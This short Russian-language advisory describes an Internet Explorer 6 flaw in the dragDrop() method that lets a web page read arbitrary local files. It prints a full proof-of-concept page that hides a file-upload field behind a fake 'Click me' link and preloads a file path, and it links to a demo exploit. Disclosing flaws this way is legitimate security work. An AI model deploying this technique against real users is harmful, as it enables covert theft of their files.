Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может создать злонамеренный код, который
позволит прочитать произвольный файл на
системе. 

Уязвимость обнаружена в dragDrop() методе. Согласно сообщению, удаленный пользователь может создать злонамеренный HMTL код, который заставит пользователя загрузить произвольный текст в HTML upload управление. В результате удаленный пользователь может читать произвольные файлы на системе пользователя. Пример: 

<head>
<script language=»javascript»>

function handleOnmousedown() {

top.moveBy(1,0)
document.all.target.style.left = 10;
window.setTimeout(«top.moveBy(-1,0)», 5);
document.all.source.dragDrop();
}

function handleDragstart() {

window.event.dataTransfer.setData(«text», «c:\\jelmer.txt»)
}

</script>
<style>
fakelink { color: Blue; cursor: hand; text-decoration: underline; }
#target {position: absolute; left: -300px; z-index: 1;}
</style>

</head>
<body>
<span id=»source» class=»fakelink» onmousedown=»handleOnmousedown()» 
ondragstart=»handleDragstart()»>Click me</span>
<input id=»target» type=»file»> 
</body>

Демонстрационный эксплоит можно посмотреть здесь:
http://kuperus.xs4all.nl/security/ie/xfiles.htm.  

Уязвимость проверена в IE 6 sp1 + все исправления.



Оставить мнение